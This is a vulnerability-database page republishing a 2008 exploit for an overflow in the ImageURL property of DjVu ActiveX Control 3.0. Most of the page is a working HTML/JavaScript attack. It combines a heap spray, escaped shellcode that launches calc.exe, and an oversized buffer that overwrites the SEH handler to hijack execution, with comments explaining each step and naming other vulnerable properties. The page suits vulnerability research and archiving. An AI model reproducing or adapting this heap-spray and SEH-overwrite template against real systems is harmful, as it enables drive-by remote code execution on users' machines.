Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

DjVu ActiveX Control 3.0 ImageURL Property Overflow Exploit

🗓️ 30 Oct 2008 00:00:00Reported by Shahriyar JalayeriType 
zdt
 zdt🔗 0day.today👁 16 Views

DjVu ActiveX Control 3.0 ImageURL Property Overflow Exploit from DjVu or

Code
===========================================================
DjVu ActiveX Control 3.0 ImageURL Property Overflow Exploit
===========================================================

<!--
DjVu ActiveX Control ImageURL Property Overflow
From DjVu.org :
"DjVu (pronounced "d?j? vu") is a digital document format with advanced compression technology and high performance value. 
DjVu allows for the distribution on the Internet and on DVD of very high resolution images of scanned documents, 
digital documents, and photographs. DjVu viewers are available for the web browser, the desktop, and PDA devices."

vulnerability is in DjVu ActiveX Control 3.0 for Microsoft (r) Office ( DjVu_ActiveX_MSOffice.dll)
you can use heap spray to exploit this vulneability but I like to use this multiple technique ( SEH overwrite + Heap Spray ) 
oooo, there is also /SafeSEH OFF 
other properties are also vulnerable ( Mode or maybe Page and Zoom )
-------------------------------------------------------------------------------------------------------------------------------------------------
{ special Tnx goes to my friends : str0ke , Amir Ashtiyani ,Alireza , Amir , Yashar , Vahid  and all snoop members }
Shahriyar Jalayeri  <Shahriyar.j // gmail // com > 
Snoop Security Research committee < Snoop-security.com >
-->
<html>
<object id=boom classid="clsid:4A46B8CD-F7BD-11D4-B1D8-000102290E7C" ></object>
  <input language=JavaScript onclick=Exploiter() type=button value="Launch Exploit">
   <script>
   // clac.exe
   var shellcode = unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
                           "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
                           "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
                           "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
                           "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
                           "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
                           "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
                           "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
                           "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
                           "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
                           "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
                           "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
                           "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
                           "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
                           "%u652E%u6578%u9000");
						

 var spraySlide = unescape("%u9090%u9090");
 // address I use to jump ( ASCII Address ) 
 var heapSprayToAddress = 0x0a0a0a0a;
 var heapBlockSize = 0x400000;
 var SizeOfHeapDataMoreover = 0x5;
 var payLoadSize = (shellcode.length * 2);
 var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover);
 var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;
 var memory = new Array();
 function getSpraySlide(spraySlide, spraySlideSize)
   {
    while (spraySlide.length*2<spraySlideSize)
     {
      spraySlide += spraySlide;
     }
    spraySlide = spraySlide.substring(0,spraySlideSize/2);
    return (spraySlide);
   }
  spraySlide = getSpraySlide(spraySlide,spraySlideSize);
   for (i=0;i<heapBlocks;i++)
  {
    memory[i] = spraySlide +  shellcode;
  }
function Exploiter(){
	var Buffer = 'A';
	// this size  of  'A' strings overwrite eip and  it cause and exception so we jumt to seh handler
	var BufferSize = 1684;
	// Next seh handler never execute
	var NextSehHandler = unescape("%90%90%90%90");
	// now we jump to our address in sprayed heap block and the Shellcode get execute !
	var SehHandler = unescape("%0a%0a%0a%0a");
	while(Buffer.length<BufferSize) Buffer += Buffer;
	Buffer = Buffer.substring(0,BufferSize);
	boom.ImageURL = Buffer + NextSehHandler + SehHandler ; 
}
   </script>
</html>



#  0day.today [2018-01-24]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Oct 2008 00:00Current
7.1High risk
Vulners AI Score7.1
vulnerabilitydjvu activex controlheap sprayseh overwriteheap spraysafeseh offimageurl propertymodepagezoomsecurity researcherssnoop security research committee
16